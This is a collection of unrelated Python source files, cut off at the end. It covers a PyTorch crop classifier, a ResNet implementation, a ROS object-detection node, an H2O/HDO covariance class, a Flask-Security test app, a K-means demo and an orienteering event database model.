This script is the classifier counterpart to detection/run_tf_detector_batch.py.
This script takes as input:
1) a detections JSON file, usually the output of run_tf_detector_batch.py or the
output of the Batch API in the "Batch processing API output format"
2) a path to a directory containing crops of bounding boxes from the detections
JSON file
3) a path to a PyTorch TorchScript compiled model file
4) (if the model is EfficientNet) an image size
By default, this script overwrites the detections JSON file, adding in
classification results. To output a new JSON file, use the --output argument.
Example usage:
python run_classifier.py \
detections.json \
/path/to/crops \
/path/to/model.pt \
--image-size 224
"""
from __future__ import annotations
import argparse
from collections.abc import Callable, Sequence
import json
import os
from typing import Any, Optional
import pandas as pd
import PIL
import torch
import torch.utils
import torchvision as tv
from torchvision.datasets.folder import default_loader
from tqdm import tqdm
from classification import train_classifier
class SimpleDataset(torch.utils.data.Dataset):
"""Very simple dataset."""
def __init__(self, img_files: Sequence[str],
images_dir: Optional[str] = None,
transform: Optional[Callable[[PIL.Image.Image], Any]] = None):
"""Creates a SimpleDataset."""
self.img_files = img_files
self.images_dir = images_dir
self.transform = transform
def __getitem__(self, index: int) -> tuple[Any, str]:
"""
Returns: tuple, (img, img_file)
"""
img_file = self.img_files[index]
if self.images_dir is not None:
img_path = os.path.join(self.images_dir, img_file)
else:
img_path = img_file
img = default_loader(img_path)
if self.transform is not None:
img = self.transform(img)
return img, img_file
def __len__(self) -> int:
return len(self.img_files)
def create_loader(cropped_images_dir: str,
detections_json_path: Optional[str],
img_size: int,
batch_size: int,
num_workers: int
) -> torch.utils.data.DataLoader:
"""Creates a DataLoader.
Args:
cropped_images_dir: str, path to image crops
        detections_json_path: optional str, path to detections JSON file; if given,
            only crops corresponding to its detections are loaded
"""
crop_files = []
if detections_json_path is None:
# recursively find all files in cropped_images_dir
for subdir, _, files in os.walk(cropped_images_dir):
for file_name in files:
rel_dir = os.path.relpath(subdir, cropped_images_dir)
rel_file = os.path.join(rel_dir, file_name)
crop_files.append(rel_file)
else:
# only find crops of images from detections JSON
print('Loading detections JSON')
with open(detections_json_path, 'r') as f:
js = json.load(f)
detections = {img['file']: img for img in js['images']}
for img_file, info_dict in tqdm(detections.items()):
if 'detections' not in info_dict or info_dict['detections'] is None:
continue
for i in range(len(info_dict['detections'])):
crop_filename = img_file + f'___crop{i:02d}_mdv4.1.jpg'
crop_path = os.path.join(cropped_images_dir, crop_filename)
if os.path.exists(crop_path):
crop_files.append(crop_filename)
transform = tv.transforms.Compose([
# resizes smaller edge to img_size
tv.transforms.Resize(img_size, interpolation=PIL.Image.BICUBIC),
tv.transforms.CenterCrop(img_size),
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean=train_classifier.MEANS,
std=train_classifier.STDS, inplace=True)
])
dataset = SimpleDataset(img_files=crop_files, images_dir=cropped_images_dir,
transform=transform)
assert len(dataset) > 0
loader = torch.utils.data.DataLoader(
dataset, batch_size=batch_size, num_workers=num_workers,
pin_memory=True)
return loader
def main(model_path: str,
cropped_images_dir: str,
output_csv_path: str,
detections_json_path: Optional[str],
classifier_categories_json_path: Optional[str],
img_size: int,
batch_size: int,
num_workers: int) -> None:
"""Main function."""
# evaluating with accimage is much faster than Pillow or Pillow-SIMD
tv.set_image_backend('accimage')
# create dataset
print('Creating data loader')
loader = create_loader(
cropped_images_dir, detections_json_path=detections_json_path,
img_size=img_size, batch_size=batch_size, num_workers=num_workers)
label_names = None
if classifier_categories_json_path is not None:
with open(classifier_categories_json_path, 'r') as f:
categories = json.load(f)
label_names = [categories[str(i)] for i in range(len(categories))]
# create model
print('Loading saved model')
model = torch.jit.load(model_path)
model, device = train_classifier.prep_device(model)
test_epoch(model, loader, device=device, label_names=label_names,
output_csv_path=output_csv_path)
def test_epoch(model: torch.nn.Module,
loader: torch.utils.data.DataLoader,
device: torch.device,
label_names: Optional[Sequence[str]],
output_csv_path: str) -> None:
"""Runs for 1 epoch.
Writes results to the output CSV in batches.
Args:
model: torch.nn.Module
loader: torch.utils.data.DataLoader
device: torch.device
label_names: optional list of str, label names
output_csv_path: str
"""
# set dropout and BN layers to eval mode
model.eval()
header = True
mode = 'w' # new file on first write
with torch.no_grad():
for inputs, img_files in tqdm(loader):
inputs = inputs.to(device, non_blocking=True)
outputs = model(inputs)
probs = torch.nn.functional.softmax(outputs, dim=1).cpu().numpy()
if label_names is None:
label_names = [str(i) for i in range(probs.shape[1])]
df = pd.DataFrame(data=probs, columns=label_names,
index=pd.Index(img_files, name='path'))
df.to_csv(output_csv_path, index=True, header=header, mode=mode)
if header:
header = False
mode = 'a'
def _parse_args() -> argparse.Namespace:
"""Parses arguments."""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Run classifier.')
parser.add_argument(
'model',
help='path to TorchScript compiled model')
parser.add_argument(
'crops_dir',
help='path to directory containing cropped images')
parser.add_argument(
'output',
help='path to save CSV file with classifier results (can use .csv.gz '
'extension for compression)')
parser.add_argument(
'-d', '--detections-json',
help='path to detections JSON file, used to filter paths within '
'crops_dir')
parser.add_argument(
'-c', '--classifier-categories',
help='path to JSON file for classifier categories. If not given, '
'classes are numbered "0", "1", "2", ...')
parser.add_argument(
'--image-size', type=int, default=224,
help='size of input image to model, usually 224px, but may be larger '
'especially for EfficientNet models')
parser.add_argument(
'--batch-size', type=int, default=1,
help='batch size for evaluating model')
parser.add_argument(
'--num-workers', type=int, default=8,
help='# of workers for data loading')
return parser.parse_args()
if __name__ == '__main__':
args = _parse_args()
main(model_path=args.model,
cropped_images_dir=args.crops_dir,
output_csv_path=args.output,
detections_json_path=args.detections_json,
classifier_categories_json_path=args.classifier_categories,
img_size=args.image_size,
batch_size=args.batch_size,
num_workers=args.num_workers)
|
#based off PyTorch implementation of ResNet with modifications
from toolz import pipe as p
from torch import nn
N_IMAGE_CHANNELS = 3
def makeConv2d(in_channels, out_channels, kernel_size=3, stride=1,
padding = 1, bias = False):
conv = nn.Conv2d(in_channels, out_channels,
kernel_size = kernel_size,
stride = stride,
padding = padding, bias = bias)
nn.init.kaiming_normal_(conv.weight, mode='fan_out',
nonlinearity='relu')
return conv
def makeBn2(num_channels):
bn = nn.BatchNorm2d(num_channels)
nn.init.constant_(bn.weight, 1)
nn.init.constant_(bn.bias, 0)
return bn
def preResLayer(out_channels = 64):
return nn.Sequential(
makeConv2d(N_IMAGE_CHANNELS, out_channels, kernel_size=7,
stride=2, padding=3),
makeBn2(out_channels),
nn.ReLU(inplace = True),
nn.MaxPool2d(kernel_size = 3, stride=2, padding=1)
)
def postResLayer(in_channels, num_classes, dropout_p = None):
blocks = [
nn.AdaptiveAvgPool2d( (1,1) ),
Lambda(flatten)]
if dropout_p is not None:
blocks.append(nn.Dropout(p=dropout_p))
blocks.append(nn.Linear(in_channels, num_classes))
    return nn.Sequential(*blocks)
#from PyTorch Website
class Lambda(nn.Module):
def __init__(self, func):
super(Lambda, self).__init__()
self.func = func
def forward(self, x):
return self.func(x)
def flatten(x):
return p(x,
lambda _: _.size(0),
lambda _: x.view(_, -1)
)
class ResNet(nn.Module):
def __init__(self, block_sizes, num_classes, in_channels = 64, p = None):
super(ResNet, self).__init__()
self.preres = preResLayer(out_channels = in_channels)
blocks = []
blocks.append(makeBlock(in_channels, in_channels, block_sizes[0], stride=1))
for i in range(1, len(block_sizes)):
out_channels = in_channels * 2
blocks.append(makeBlock(in_channels, out_channels, block_sizes[i]))
in_channels = out_channels
self.blocks = nn.Sequential(*blocks)
self.postres = postResLayer(out_channels, num_classes, dropout_p = p)
def forward(self, x):
return p(x,
self.preres,
self.blocks,
self.postres
)
#unlike PyTorch, Block is defined as an array of layers
#ResNet paper defines layers as PyTorch defines blocks
def makeBlock(in_channels, out_channels, num_layers, stride=2):
def makeLayer(i):
in_chan = in_channels if i == 0 else out_channels
stri = stride if i == 0 else 1
return ResLayer(in_chan, out_channels, stride=stri)
return nn.Sequential(*[makeLayer(i) for i in range(0, num_layers)])
class ResLayer(nn.Module):
def __init__(self, in_channels, out_channels, stride=1):
super(ResLayer, self).__init__()
self.conv1 = makeConv2d(in_channels, out_channels,
stride = stride)
self.bn1 = makeBn2(out_channels)
self.relu = nn.ReLU(inplace = True)
self.conv2 = makeConv2d(out_channels, out_channels)
self.bn2 = makeBn2(out_channels)
self.resizeInput = self.resizeInputGen(in_channels, out_channels, stride)
self.stride = stride
def resizeInputGen(self, in_channels, out_channels, stride):
resizeInput = lambda _: _
if in_channels != out_channels or stride != 1:
resizeInput = nn.Sequential(
makeConv2d(
in_channels, out_channels, kernel_size = 1, stride = stride, padding=0),
makeBn2(out_channels)
)
return resizeInput
def forward(self, x):
def addInput(processed_x):
return processed_x + self.resizeInput(x)
return p(x,
self.conv1,
self.bn1,
self.relu,
self.conv2,
self.bn2,
addInput,
self.relu
)
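# A minimal smoke-test sketch (added for illustration, not part of the original module):
# builds a ResNet-18-style model from the classes above and checks the output shape on a
# random batch of 224x224 RGB images.
if __name__ == '__main__':
    import torch
    # four groups of two ResLayers each, as in ResNet-18, with optional dropout before the classifier
    model = ResNet([2, 2, 2, 2], num_classes=10, p=0.5)
    out = model(torch.randn(2, 3, 224, 224))
    print(out.shape)  # expected: torch.Size([2, 10])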
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import rospy
import numpy
import tf
from os.path import expanduser
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs import point_cloud2 as pc2
from sensor_msgs.msg import Image, PointCloud2
from dodo_detector.detection import TFObjectDetectorV1, KeypointObjectDetector
from dodo_detector_ros.msg import DetectedObject, DetectedObjectArray
class Detector:
def __init__(self):
# get label map and inference graph from params
detector_type = rospy.get_param('~detector_type')
frozen_graph = rospy.get_param('~inference_graph', '')
label_map = rospy.get_param('~label_map', '')
confidence = rospy.get_param('~tf_confidence', 0.5)
min_points = rospy.get_param('~sift_min_pts', 10)
database_path = rospy.get_param('~sift_database_path', '')
filters = rospy.get_param('~filters', {})
image_topic = rospy.get_param('~image_topic')
point_cloud_topic = rospy.get_param('~point_cloud_topic', None)
self._global_frame = rospy.get_param('~global_frame', None)
self._tf_prefix = rospy.get_param('~tf_prefix', rospy.get_name())
# create a transform listener so we get the fixed frame the user wants
# to publish object tfs related to
self._tf_listener = tf.TransformListener()
if detector_type == 'tf':
rospy.loginfo('Chosen detector type: TensorFlow')
if len(frozen_graph) == 0:
raise ValueError('Parameter \'frozen_graph\' must be passed')
if len(label_map) == 0:
raise ValueError('Parameter \'label_map\' must be passed')
if confidence <= 0 or confidence > 1:
raise ValueError('Parameter \'confidence\' must be between 0 and 1')
frozen_graph = expanduser(frozen_graph)
label_map = expanduser(label_map)
self._detector = TFObjectDetectorV1(frozen_graph, label_map, confidence=confidence)
rospy.loginfo('Path to inference graph: ' + frozen_graph)
rospy.loginfo('Path to label map: ' + label_map)
# count number of classes from label map
label_map_contents = open(label_map, 'r').read()
num_classes = label_map_contents.count('name:')
rospy.loginfo('Number of classes: ' + str(num_classes))
elif detector_type in ['sift', 'rootsift']:
rospy.loginfo('Chosen detector type: Keypoint Object Detector')
if min_points <= 0:
                raise ValueError('Parameter \'min_points\' must be greater than 0')
if len(database_path) == 0:
raise ValueError('Parameter \'database_path\' must be passed')
database_path = expanduser(database_path)
detector_type = 'SIFT' if detector_type == 'sift' else 'RootSIFT'
self._detector = KeypointObjectDetector(database_path,
detector_type,
min_points=min_points)
rospy.loginfo('Database path: ' + database_path)
rospy.loginfo('Min. points: ' + str(min_points))
# create detector
self._bridge = CvBridge()
# image and point cloud subscribers
# and variables that will hold their values
rospy.Subscriber(image_topic, Image, self.image_callback)
if point_cloud_topic is not None:
rospy.Subscriber(point_cloud_topic, PointCloud2, self.pc_callback)
else:
rospy.loginfo(
'No point cloud information available. Objects will not be placed in the scene.')
self._current_image = None
self._current_pc = None
# publisher for frames with detected objects
self._imagepub = rospy.Publisher('~labeled_image', Image, queue_size=10)
# this package works with a dynamic list of publishers
# if no filter is configured via parameters to the package,
# one default, unfiltered publisher will publish every object
if len(filters) == 0:
rospy.loginfo('No filter configured, publishing every detected object in a single topic')
self._publishers = {
None: (None, rospy.Publisher('~detected', DetectedObjectArray, queue_size=10))}
# else, for each filter created in the yaml config file, a new publisher is created
else:
self._publishers = {}
for key in filters:
cat_ok = False
for cat in self._detector.categories:
if cat in filters[key]:
cat_ok = True
break
if not cat_ok:
rospy.logwarn('Key ' + filters[key] + ' is not detected by this detector!')
else:
self._publishers[key] = (filters[key],
rospy.Publisher('~detected_' + key,
DetectedObjectArray,
queue_size=10))
rospy.loginfo('Created topic for filter [' + key + ']')
self._tfpub = tf.TransformBroadcaster()
rospy.loginfo('Ready to detect!')
def image_callback(self, image):
"""Image callback"""
# Store value on a private attribute
self._current_image = image
def pc_callback(self, pc):
"""Point cloud callback"""
# Store value on a private attribute
self._current_pc = pc
def run(self):
# run while ROS runs
while not rospy.is_shutdown():
# only run if there's an image present
if self._current_image is not None:
try:
# if the user passes a fixed frame, we'll ask for transformation
# vectors from the camera link to the fixed frame
if self._global_frame is not None:
(trans, _) = self._tf_listener.lookupTransform('/' + self._global_frame,
'/camera_link',
rospy.Time(0))
# convert image from the subscriber into an OpenCV image
scene = self._bridge.imgmsg_to_cv2(self._current_image, 'rgb8')
marked_image, objects = self._detector.from_image(scene) # detect objects
self._imagepub.publish(self._bridge.cv2_to_imgmsg(
marked_image, 'rgb8')) # publish detection results
                    # we'll create an empty msg for each publisher
msgs = {}
for key in self._publishers:
msgs[key] = DetectedObjectArray()
# iterate over the dictionary of detected objects
for obj_class in objects:
rospy.logdebug('Found ' + str(len(objects[obj_class])) + ' object(s) of type ' +
obj_class)
for obj_type_index, coordinates in enumerate(objects[obj_class]):
rospy.logdebug('...' + obj_class + ' ' + str(obj_type_index) + ' at ' +
str(coordinates['box']))
ymin, xmin, ymax, xmax = coordinates['box']
y_center = ymax - ((ymax - ymin) / 2)
x_center = xmax - ((xmax - xmin) / 2)
detected_object = DetectedObject()
detected_object.type.data = obj_class
detected_object.image_x.data = xmin
detected_object.image_y.data = ymin
detected_object.image_width.data = xmax - xmin
detected_object.image_height.data = ymax - ymin
# TODO the timestamp of image, depth and point cloud should be checked
# to make sure we are using synchronized data...
publish_tf = False
if self._current_pc is None:
rospy.loginfo(
'No point cloud information available to track current object in scene')
# if there is point cloud data, we'll try to place a tf
# in the object's location
else:
# this function gives us a generator of points.
# we ask for a single point in the center of our object.
pc_list = list(
pc2.read_points(self._current_pc,
skip_nans=True,
field_names=('x', 'y', 'z'),
uvs=[(x_center, y_center)]))
if len(pc_list) > 0:
publish_tf = True
# this is the location of our object in space
tf_id = obj_class + '_' + str(obj_type_index)
# if the user passes a tf prefix, we append it to the object tf name here
if self._tf_prefix is not None:
tf_id = self._tf_prefix + '/' + tf_id
detected_object.tf_id.data = tf_id
point_x, point_y, point_z = pc_list[0]
for key in self._publishers:
# add the object to the unfiltered publisher,
# as well as the ones whose filter include this class of objects
if key is None or obj_class in self._publishers[key][0]:
msgs[key].detected_objects.append(detected_object)
# we'll publish a TF related to this object only once
if publish_tf:
# kinect here is mapped as camera_link
# object tf (x, y, z) must be
# passed as (z,-x,-y)
object_tf = [point_z, -point_x, -point_y]
frame = 'camera_link'
# translate the tf in regard to the fixed frame
if self._global_frame is not None:
object_tf = numpy.array(trans) + object_tf
frame = self._global_frame
                                    # this fixes #7 on GitHub, when applying the
                                    # translation to the tf creates a vector that
                                    # RViz just can't handle
if object_tf is not None:
self._tfpub.sendTransform((object_tf),
tf.transformations.quaternion_from_euler(
0, 0, 0),
rospy.Time.now(),
tf_id,
frame)
# publish all the messages in their corresponding publishers
for key in self._publishers:
self._publishers[key][1].publish(msgs[key])
except CvBridgeError as e:
print(e)
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException) as e:
print(e)
if __name__ == '__main__':
rospy.init_node('dodo_detector_ros', log_level=rospy.INFO)
try:
Detector().run()
except KeyboardInterrupt:
rospy.loginfo('Shutting down')
|
from functools import partial
import numpy as np
class Covariance:
def __init__(self, nol: int, alt: np.ma.MaskedArray):
"""assumed covariances
:param no number of levels
:param alt altitudes
"""
self.nol = nol
self.alt = alt
def gaussian(self, x, mu, sig):
"""Gaussian function
:param x: Input value
:param mu: Mean value of gaussian
:param sig: Standard deviation of gaussian
"""
return np.exp(-((x - mu)*(x - mu))/(2 * sig * sig))
def traf(self) -> np.ndarray:
"""P (see equation 6)
Used to transform {ln[H2O], ln[HDO]} state
        into the new coordinate system
{(ln[H2O]+ln[HDO])/2 and ln[HDO]-ln[H2O]}
"""
return np.block([[np.identity(self.nol)*0.5, np.identity(self.nol)*0.5],
[-np.identity(self.nol), np.identity(self.nol)]])
def assumed_covariance(self, species=2, w1=1.0, w2=0.01, correlation_length=2500) -> np.ndarray:
"""Sa' (see equation 7)
A priori covariance of {(ln[H2O]+ln[HDO])/2 and ln[HDO]-ln[H2O]} state
        Sa: see equation 5 in the paper
        :param species: Number of atmospheric species (1 or 2)
:param w1: Weight for upper left quadrant
:param w2: Weight for lower right quadrant (ignored with 1 species)
:param correlation_length: Assumed correlation of atmospheric levels in meter
"""
# only 1 or 2 species are allowed
assert (species >= 1) and (species <= 2)
result = np.zeros((species * self.nol, species * self.nol))
for i in range(self.nol):
for j in range(self.nol):
# 2500 = correlation length
# 100% for
# (ln[H2O]+ln[HDO])/2 state
result[i, j] = w1 * \
self.gaussian(self.alt[i], self.alt[j], correlation_length)
if species == 2:
# 10% for (0.01 covariance)
# ln[HDO]-ln[H2O] state
result[i + self.nol, j + self.nol] = w2 * \
self.gaussian(
self.alt[i], self.alt[j], correlation_length)
return result
def apriori_covariance(self) -> np.ndarray:
"""Sa (see equation 5)
A priori Covariance of {ln[H2O], ln[HDO]} state
Sa' = P * Sa * P.T (equation 7 in paper)
equals to
Sa = inv(P) * Sa' * inv(P.T)
"""
P = self.traf()
        return np.linalg.inv(P) @ self.assumed_covariance() @ np.linalg.inv(P.T)
def type1_of(self, matrix) -> np.ndarray:
"""A' (see equation 10)
        Return transformed matrix
"""
P = self.traf()
return P @ matrix @ np.linalg.inv(P)
def c_by_type1(self, A_) -> np.ndarray:
return np.block([[A_[self.nol:, self.nol:], np.zeros((self.nol, self.nol))],
[-A_[self.nol:, :self.nol], np.identity(self.nol)]])
def c_by_avk(self, avk):
A_ = self.type1_of(avk)
return self.c_by_type1(A_)
def type2_of(self, matrix) -> np.ndarray:
"""A'' (see equation 15)
A posteriori transformed matrix
"""
A_ = self.type1_of(matrix)
C = self.c_by_type1(A_)
return C @ A_
def smoothing_error(self, actual_matrix, to_compare, **kwargs) -> np.ndarray:
"""S's (see equation 11)
"""
return (actual_matrix - to_compare) @ self.assumed_covariance(**kwargs) @ (actual_matrix - to_compare).T
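# A minimal usage sketch (illustrative only; the altitude grid below is synthetic and not
# taken from any real retrieval): builds the assumed covariance Sa' of equation 7 for a
# small two-species {H2O, HDO} state and the transformation matrix P of equation 6.
if __name__ == '__main__':
    nol = 5
    alt = np.ma.masked_array(np.linspace(0.0, 10000.0, nol))
    cov = Covariance(nol, alt)
    Sa_prime = cov.assumed_covariance(species=2, w1=1.0, w2=0.01, correlation_length=2500)
    P = cov.traf()
    print(Sa_prime.shape, P.shape)  # both are (2 * nol, 2 * nol)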
|
# -*- coding: utf-8 -*-
from flask import Flask, render_template, current_app
from flask.ext.mail import Mail
from flask.ext.security import login_required, roles_required, roles_accepted
from flask.ext.security.decorators import http_auth_required, \
auth_token_required, auth_required
from flask.ext.security.utils import encrypt_password
from werkzeug.local import LocalProxy
ds = LocalProxy(lambda: current_app.extensions['security'].datastore)
def create_app(config):
app = Flask(__name__)
app.debug = True
app.config['SECRET_KEY'] = 'secret'
app.config['TESTING'] = True
for key, value in config.items():
app.config[key] = value
mail = Mail(app)
app.extensions['mail'] = mail
@app.route('/')
def index():
return render_template('index.html', content='Home Page')
@app.route('/profile')
@login_required
def profile():
return render_template('index.html', content='Profile Page')
@app.route('/post_login')
@login_required
def post_login():
return render_template('index.html', content='Post Login')
@app.route('/http')
@http_auth_required
def http():
return 'HTTP Authentication'
@app.route('/http_custom_realm')
@http_auth_required('My Realm')
def http_custom_realm():
return render_template('index.html', content='HTTP Authentication')
@app.route('/token')
@auth_token_required
def token():
return render_template('index.html', content='Token Authentication')
@app.route('/multi_auth')
@auth_required('session', 'token', 'basic')
def multi_auth():
return render_template('index.html', content='Session, Token, Basic auth')
@app.route('/post_logout')
def post_logout():
return render_template('index.html', content='Post Logout')
@app.route('/post_register')
def post_register():
return render_template('index.html', content='Post Register')
@app.route('/admin')
@roles_required('admin')
def admin():
return render_template('index.html', content='Admin Page')
@app.route('/admin_and_editor')
@roles_required('admin', 'editor')
def admin_and_editor():
return render_template('index.html', content='Admin and Editor Page')
@app.route('/admin_or_editor')
@roles_accepted('admin', 'editor')
def admin_or_editor():
return render_template('index.html', content='Admin or Editor Page')
@app.route('/unauthorized')
def unauthorized():
return render_template('unauthorized.html')
@app.route('/coverage/add_role_to_user')
def add_role_to_user():
u = ds.find_user(email='joe@lp.com')
r = ds.find_role('admin')
ds.add_role_to_user(u, r)
return 'success'
@app.route('/coverage/remove_role_from_user')
def remove_role_from_user():
u = ds.find_user(email='matt@lp.com')
ds.remove_role_from_user(u, 'admin')
return 'success'
@app.route('/coverage/deactivate_user')
def deactivate_user():
u = ds.find_user(email='matt@lp.com')
ds.deactivate_user(u)
return 'success'
@app.route('/coverage/activate_user')
def activate_user():
u = ds.find_user(email='tiya@lp.com')
ds.activate_user(u)
return 'success'
@app.route('/coverage/invalid_role')
def invalid_role():
return 'success' if ds.find_role('bogus') is None else 'failure'
@app.route('/page1')
def page_1():
return 'Page 1'
return app
def create_roles():
for role in ('admin', 'editor', 'author'):
ds.create_role(name=role)
ds.commit()
def create_users(count=None):
users = [('matt@lp.com', 'password', ['admin'], True),
('joe@lp.com', 'password', ['editor'], True),
('dave@lp.com', 'password', ['admin', 'editor'], True),
('jill@lp.com', 'password', ['author'], True),
('tiya@lp.com', 'password', [], False)]
count = count or len(users)
for u in users[:count]:
pw = encrypt_password(u[1])
ds.create_user(email=u[0], password=pw,
roles=u[2], active=u[3])
ds.commit()
def populate_data(user_count=None):
create_roles()
create_users(user_count)
def add_context_processors(s):
@s.context_processor
def for_all():
return dict()
@s.forgot_password_context_processor
def forgot_password():
return dict()
@s.login_context_processor
def login():
return dict()
@s.register_context_processor
def register():
return dict()
@s.reset_password_context_processor
def reset_password():
return dict()
@s.send_confirmation_context_processor
def send_confirmation():
return dict()
@s.send_login_context_processor
def send_login():
return dict()
@s.mail_context_processor
def mail():
return dict()
|
import numpy as np
import matplotlib.pyplot as plt
entrada = np.array([[-0.4712, 1.7698], [0.1103, 3.1334], [2.0263,3.2474],
[1.5697, 0.7579], [1.7254, 4.0834], [2.2676, 0.4092],
[-0.4753, 1.1308], [3.2018, 3.1839], [2.0614, 1.6423],
[2.4969, 1.6099], [7.1547, 5.4719], [5.8240, 6.5220],
[7.0105, 8.9157], [6.3086, 6.0023], [6.1122, 6.2530],
[4.1822, 5.1714], [7.5074, 7.1391], [8.5628, 7.4580],
[6.9596, 5.4075], [6.7379, 10.1990], [2.1959, 7.1072],
[4.9906, 7.8603], [4.0592, 6.7196], [-0.3881, 6.8434],
[3.1318, 6.1018], [3.2421, 8.2583], [1.2560, 5.9102],
[2.8671, 5.8639], [1.8885, 5.8148], [1.0263, 7.9487],
[4.9782, 0.8005], [6.5436, 2.1400], [6.4685, 2.3265],
[7.8461, 1.3620], [6.6673, 2.8004], [6.8124, 2.7228],
[5.8382, 1.9450], [7.1404, 3.3512], [7.1251, 4.9571],
[4.7644, 2.3254],[7.5, 10.4], [-2.23, -1.522], [1.9, -7.2], [13.455, -5.0],[-3, -4],
[3.388, 5.239],[0.23, 0.1], [-1, 2.34]])
def plot(idx):
idx = np.array(idx)
plt.scatter(entrada[:, 0], entrada[:, 1], c = idx, s=100)
plt.scatter(Centroide[:, 0], Centroide[:, 1], s=1000, c=np.array([i for i in range(len(Centroide))]), marker='*')
    plt.title('Centroids')
    plt.xlabel('Input X0')
    plt.ylabel('Input X1')
plt.axis('equal')
plt.pause(0.75)
def initList(size):
mylist = list()
for i in range(size):
mylist.append( list() ) #different object reference each time
return mylist
def init(NCentroides, NEntradas):
idx = np.random.permutation(entrada.shape[0])[0:NCentroides]
return entrada[idx, :]
def EuclideanDistance(Centroide, Entrada):
distance = np.zeros((Entrada.shape[0], Centroide.shape[0]))
for k in range(Centroide.shape[0]):
for i in range(Entrada.shape[0]):
for j in range(Entrada.shape[1]):
distance[i, k] += (Entrada[i, j] - Centroide[k, j])**2
distance[i, k] = np.sqrt(distance[i, k])
return distance
def KMeans(Entrada, Centroide):
oldC = np.zeros((Centroide.shape))
count = 0
while True:
count += 1
pointCentroides = initList(Centroide.shape[0])
Distance = EuclideanDistance(Centroide, Entrada)
Distance = list(Distance)
idx = []
for i in range(len(Distance)):
Distance[i]= list(Distance[i])
for i in range(Entrada.shape[0]):
shortest = min(Distance[i])
index = Distance[i].index(shortest)
idx.append(index)
pointCentroides[index].append(Entrada[i, :].tolist())
nppc = [0]*len(pointCentroides)
for x in range(len(pointCentroides)):
nppc[x] = len(pointCentroides[x])
pointCentroides[x] = np.array(pointCentroides[x])
pointCentroides[x] = sum(pointCentroides[x])/len(pointCentroides[x])
Centroide[x] = pointCentroides[x]
if (Centroide == oldC).all():
plot(idx)
break
else:
plot(idx)
plt.gcf().clear()
oldC = np.copy(Centroide)
    print('Final centroids: ', Centroide, '\nCount', count)
plt.show()
return Centroide, nppc
Centroide = init(6, entrada.shape[1])
KMeans(entrada, Centroide)
# nc = 15
# nmppc = int(0.1*entrada.shape[0])
# for i in range(nc, 0, -1):
# Centroide = init(i, entrada.shape[1])
# _, xxx = KMeans(entrada, Centroide)
# if sum(list(map(lambda x: x >= nmppc, xxx))) == i:
# print(i)
# break
|
from __future__ import annotations
import os
import base64
import json
from typing import Any, Dict, List, Optional, Union
from .database import query, queryWithResult, queryWithResults
from .league import League
def getJSON(data: str) -> Dict[str, Any]:
if data:
try:
return json.loads(data)
except:
return {}
return {}
properties = [
"id",
"name",
"date",
"website",
"organiser",
"moreInformation",
"leagueName",
"resultUploaded",
"results",
"winsplits",
"routegadget",
"userSubmittedResults",
"secondaryLeague",
"requiredInTotal",
"additionalSettings",
"uploadKey",
]
def generateUploadKey() -> str:
# Generate Random Upload Key
random = os.urandom(15)
string = str(base64.b64encode(random))
return string[2:22]
class Event:
# event information
id: str
name: str
date: str
website: str
organiser: str
moreInformation: str
    league: Optional[str]  # from initialization
leagueName: str
# results in second league
secondaryLeague: Optional[str]
# results
resultUploaded: bool
results: str
winsplits: str
routegadget: str
userSubmittedResults: bool
requiredInTotal: bool
additionalSettings: str
uploadKey: str
def __init__(self, event):
if type(event) == dict:
for key in event:
setattr(self, key, event[key])
else:
for (index, key) in enumerate(properties):
setattr(self, key, event[index])
if hasattr(self, "league") and self.league:
self.leagueName = self.league
def toDictionary(self) -> Dict[str, Any]:
return {
"id": self.id,
"name": self.name,
"date": self.date,
"website": self.website,
"organiser": self.organiser,
"moreInformation": self.moreInformation,
"league": self.leagueName,
"resultUploaded": self.resultUploaded,
"results": self.results,
"winsplits": self.winsplits,
"routegadget": self.routegadget,
"userSubmittedResults": self.userSubmittedResults,
"secondaryLeague": self.secondaryLeague,
"additionalSettings": self.additionalSettings,
"requiredInTotal": self.requiredInTotal,
}
def toDictionaryWithUploadKey(self) -> Dict[str, Any]:
return {
**self.toDictionary(),
"uploadKey": self.uploadKey,
}
def getEventId(self) -> str:
return (self.leagueName + self.name + self.date).replace(" ", "")
def getLeague(self) -> League:
return League.getByName(self.leagueName)
def getAdditionalSettingsAsJSON(self) -> Dict[str, Any]:
return getJSON(self.additionalSettings)
def create(self) -> None:
query(
"""
INSERT INTO events (
id,
name,
date,
website,
organiser,
moreInformation,
league,
resultUploaded,
results,
winsplits,
routegadget,
userSubmittedResults,
secondaryLeague,
requiredInTotal,
additionalSettings,
uploadKey
) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
""",
(
self.getEventId(),
self.name,
self.date,
self.website,
self.organiser,
self.moreInformation,
self.league,
self.resultUploaded,
self.results,
self.winsplits,
self.routegadget,
self.userSubmittedResults,
self.secondaryLeague,
self.requiredInTotal,
self.additionalSettings,
generateUploadKey(),
),
)
def update(self, oldEventId: str) -> None:
query(
"""
UPDATE events SET
id=%s,
name=%s,
date=%s,
website=%s,
organiser=%s,
moreInformation=%s,
league=%s,
resultUploaded=%s,
results=%s,
winsplits=%s,
routegadget=%s,
userSubmittedResults=%s,
secondaryLeague=%s,
requiredInTotal=%s,
additionalSettings=%s
WHERE id=%s
""",
(
self.getEventId(),
self.name,
self.date,
self.website,
self.organiser,
self.moreInformation,
self.leagueName,
self.resultUploaded,
self.results,
self.winsplits,
self.routegadget,
self.userSubmittedResults,
self.secondaryLeague,
self.requiredInTotal,
self.additionalSettings,
oldEventId,
),
)
def setResultUploaded(self) -> None:
query(
"""
UPDATE events
SET resultUploaded=%s
WHERE id=%s
""",
(True, self.getEventId()),
)
def setResultUploadedWithURLs(
self, results: str, winsplits: str, routegadget: str
) -> None:
query(
"""
UPDATE events
SET
resultUploaded=%s,
results=%s,
winsplits=%s,
routegadget=%s
WHERE id=%s
""",
(True, results, winsplits, routegadget, self.id),
)
@staticmethod
def getAll() -> List[Event]:
databaseResult = queryWithResults(
"""
SELECT
id,
name,
date,
website,
organiser,
moreInformation,
league,
resultUploaded,
results,
winsplits,
routegadget,
userSubmittedResults,
secondaryLeague,
requiredInTotal,
additionalSettings,
uploadKey
FROM events
ORDER BY date ASC, name ASC
"""
)
return [Event(result) for result in databaseResult]
@staticmethod
def getById(eventId: str) -> Optional[Event]:
databaseResult = queryWithResult(
"""
SELECT
id,
